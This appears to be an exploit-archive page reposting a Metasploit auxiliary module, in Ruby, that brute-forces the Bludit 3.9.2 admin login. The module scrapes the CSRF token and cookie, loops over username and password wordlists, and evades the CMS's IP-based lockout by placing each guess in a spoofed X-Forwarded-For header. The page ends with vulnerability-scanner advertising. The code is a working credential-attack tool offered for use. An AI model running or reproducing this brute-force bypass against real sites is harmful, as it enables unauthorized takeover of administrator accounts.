bludit 3.9.2 authentication bruteforce bypass (metasploit)

▸▸▸ Exploit & Vulnerability >>   webapps exploit & php vulnerability




bludit 3.9.2 authentication bruteforce bypass (metasploit) Code Code...
				
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize super( 'Name' => 'Bludit Panel Brute force', 'Description' => %q{ This Module performs brute force attack on Bludit Panel. }, 'Author' => 'Eren Simsek <egtorteam@gmail.com>', 'License' => MSF_LICENSE, 'DisclosureDate' => 'June 7 2020') register_options( [ OptString.new('TARGETURI', [ true, 'Bludit Panel Uri', 'admin']), OptString.new('USERNAME', [ false, 'Bludit account username']), OptString.new('PASSWORD', [ false, 'Bludit account password']), OptPath.new('USER_FILE', [ false, 'The User wordlist path']), OptPath.new('PASS_FILE', [ false, 'The Pass wordlist path']), OptBool.new('USER_AS_PASS', [ false, 'Try the username as the password for all users']), ]) end def check_variable if datastore["USERNAME"] != nil if datastore["USER_FILE"] != nil raise Msf::OptionValidateError.new(['USER_FILE']) end end if datastore["PASSWORD"] != nil if datastore["PASS_FILE"] != nil raise Msf::OptionValidateError.new(['PASS_FILE']) end end if datastore["USER_FILE"] != nil if datastore["USERNAME"] != nil raise Msf::OptionValidateError.new(['USERNAME']) end end if datastore["PASS_FILE"] != nil if datastore["PASSWORD"] != nil raise Msf::OptionValidateError.new(['PASSWORD']) end end end @signed = false def brute_force(username,password) res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path,'/'), 'method' => 'GET', }) #Send request target website username = username.strip password = password.strip #strip command remove spaces bluditkey = res.get_cookies #Send request target website and get cookies csrf = res.body.scan(/<input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="(.*?)">/).flatten[0] || '' #Get CSRF Token if bluditkey == nil #if cookies not found fail_with(Failure::UnexpectedReply, "Cookie Not Found !") end if csrf == nil #if csrf token not found fail_with(Failure::UnexpectedReply, "CSRF Not Found !") end print_warning("Trying #{username}:#{password}") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path,'/'), 'method' => 'POST', 'cookie' => bluditkey, 'headers' => { 'X-Forwarded-For' => password, #host injected and unblock ip address 'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36', 'Referer' => normalize_uri(target_uri.path,'/'), }, 'vars_post' => { #post method variables 'tokenCSRF' => csrf, 'username' => username, 'password' => password, 'save' => '', }, }) if res && res.code != 200 #if request cod not 200 ok if res && res.headers['Location'] == '/admin/dashboard' #if signed web site print_good("Found #{username}:#{password}") @signed = true else #request not 200 error fail_with(Failure::UnexpectedReply, " Request Not Success Code #{res.code}") end end end def run check_variable #check variable, not use user_file if use username res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path,'/'), 'method' => 'GET', }) if res && res.code == 200 vprint_status("Request 200 OK") else fail_with(Failure::UnexpectedReply, "Request Not Success Code #{res.code}") end if datastore["USERNAME"] != nil && datastore["PASS_FILE"] != nil unless ::File.exist?(datastore['PASS_FILE']) #check file exit, error not found if not exist file fail_with Failure::NotFound, "PASS_FILE #{datastore['PASS_FILE']} does not exists!" end @wordlist = ::File.open(datastore["PASS_FILE"],"rb") #open pass_file @wordlist.each_line do |password| #each line on wordlist password = password.strip # remove spaces if !@signed # continue if signed false brute_force(datastore["USERNAME"],password) end end end if datastore["USER_FILE"] != nil && datastore["PASSWORD"] != nil unless ::File.exist?(datastore['USER_FILE']) fail_with Failure::NotFound, "USER_FILE #{datastore['USER_FILE']} does not exists!" end @wordlist = ::File.open(datastore["USER_FILE"],"rb") @wordlist.each_line do |username| username = username.strip if !@signed brute_force(username,datastore["PASSWORD"]) end end end if datastore["USER_FILE"] != nil && datastore["PASS_FILE"] != nil unless ::File.exist?(datastore['USER_FILE']) fail_with Failure::NotFound, "USER_FILE #{datastore['USER_FILE']} does not exists!" end unless ::File.exist?(datastore['PASS_FILE']) fail_with Failure::NotFound, "PASS_FILE #{datastore['PASS_FILE']} does not exists!" end @userlist = ::File.open(datastore["USER_FILE"],"rb") @userlist.each_line do |username| username = username.strip @passlist = ::File.open(datastore["PASS_FILE"],"rb") @passlist.each_line do |password| password = password.strip if !@signed brute_force(username,password) end end end end if datastore["USER_FILE"] != nil && datastore["USER_AS_PASS"] == true && datastore["PASS_FILE"] == nil unless ::File.exist?(datastore['USER_FILE']) fail_with Failure::NotFound, "USER_FILE #{datastore['USER_FILE']} does not exist!" end @userlist = ::File.open(datastore["USER_FILE"],"rb") @userlist.each_line do |username| username = username.strip @passlist = ::File.open(datastore["USER_FILE"],"rb") @passlist.each_line do |password| password = password.strip if !@signed brute_force(username,password) end end end end end end


Last Vulnerability or Exploits

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Discover posible vulnerabilities before GO LIVE with your project
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Do an audit to find and close the high risk issues before having a real damage and increase the costs
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Bypass your network restrictions and scan from our IP for relevant results
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Scan your website from any device with internet connection

Tusted by
clients

 
  Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.